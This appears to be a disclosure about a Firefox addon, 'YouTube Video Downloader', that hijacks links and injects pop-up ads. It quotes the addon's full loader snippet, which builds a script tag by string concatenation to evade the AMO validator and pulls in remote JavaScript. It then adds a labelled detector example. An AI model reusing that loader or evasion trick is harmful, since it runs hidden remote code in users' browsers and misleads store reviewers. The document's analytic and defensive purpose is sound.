The unlisted addon YouTube Video Downloader is currently executing remote code to hijack links and inject pop-up ads.
This has been brought to attention in the following post: https://www.reddit.com/r/firefox/comments/3vl3yz/getting_tons_of_popup_tabs_all_of_a_sudden_with/
A quick inspection of its source code already shows a red flag in the contents of its include folder, namely the link_modifier.js file, which contains the following code in its entirety:
```javascript
var s = document.createElement('scr'+'ipt');
s.type = 'text/ja'+'va'+'scr'+'ipt';
s.src = 'http://www.sourcecrab.com/YouTube_Extend/ff_http_extend.js';
document.getElementsByTagName('head')[0].appendChild(s);
```
It is evident that the developer intended to bypass the AMO validator (when it was running for unlisted addons) by building the tag name and type of a dangerous element through string concatenation, so that the word "script" never appears as a single literal in the file. The file then loads and executes an external script.
I didn’t find any notice/content policy informing the user of this malware-like behavior and don’t think I needed to inspect more of the source code after finding that file.
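The concatenation trick described above only defeats checks that match on literal text, so a reviewer-side scan can fold adjacent string literals before applying its rules. The following is an added example, not code from the addon or from the AMO validator; the rule names, the `foldConcats` and `scan` helpers and the placeholder host are assumptions made for illustration.

```javascript
// Added example: defender-side check, not AMO validator code. Regex sketch,
// not a JS parser: folds quoted literals joined by "+", decodes no escapes.

// Two adjacent string literals joined by "+", e.g. 'scr' + 'ipt'.
const CONCAT =
  /(['"])((?:\\.|(?!\1)[^\\\n])*)\1\s*\+\s*(['"])((?:\\.|(?!\3)[^\\\n])*)\3/;

// Repeatedly merge literal + literal until the source stops changing.
function foldConcats(src) {
  let prev;
  do {
    prev = src;
    src = src.replace(CONCAT, (_, q1, a, q2, b) => {
      // Mixed quotes: escape bare q1 characters so b fits in a q1 literal.
      if (q1 !== q2) {
        b = b.replace(new RegExp(`(\\\\.)|${q1}`, 'g'),
                      (m, esc) => esc || '\\' + q1);
      }
      return q1 + a + b + q1;
    });
  } while (src !== prev);
  return src;
}

// Hypothetical rule set for this example.
const RULES = [
  { id: 'dynamic-script-element',
    re: /createElement\s*\(\s*['"]script['"]\s*\)/i },
  { id: 'remote-script-src',
    re: /\.src\s*=\s*['"](?:https?:)?\/\/[^'"]+['"]/i },
];

// Run the rules on the folded source; note which hits the raw text hid.
function scan(src) {
  const folded = foldConcats(src);
  return RULES.filter(r => r.re.test(folded)).map(r => ({
    rule: r.id,
    hiddenByConcat: !r.re.test(src),
  }));
}

// Constructed sample modelled on link_modifier.js; the host is a placeholder.
const SAMPLE = [
  "var s = document.createElement('scr'+'ipt');",
  "s.type = 'text/ja'+'va'+'scr'+'ipt';",
  "s.src = 'http://remote.example/ext.js';",
  "document.getElementsByTagName('head')[0].appendChild(s);",
].join('\n');
console.log(scan(SAMPLE));
```

A finding with `hiddenByConcat: true` is the more interesting signal for review, since it marks a pattern that only appears once the literals are joined.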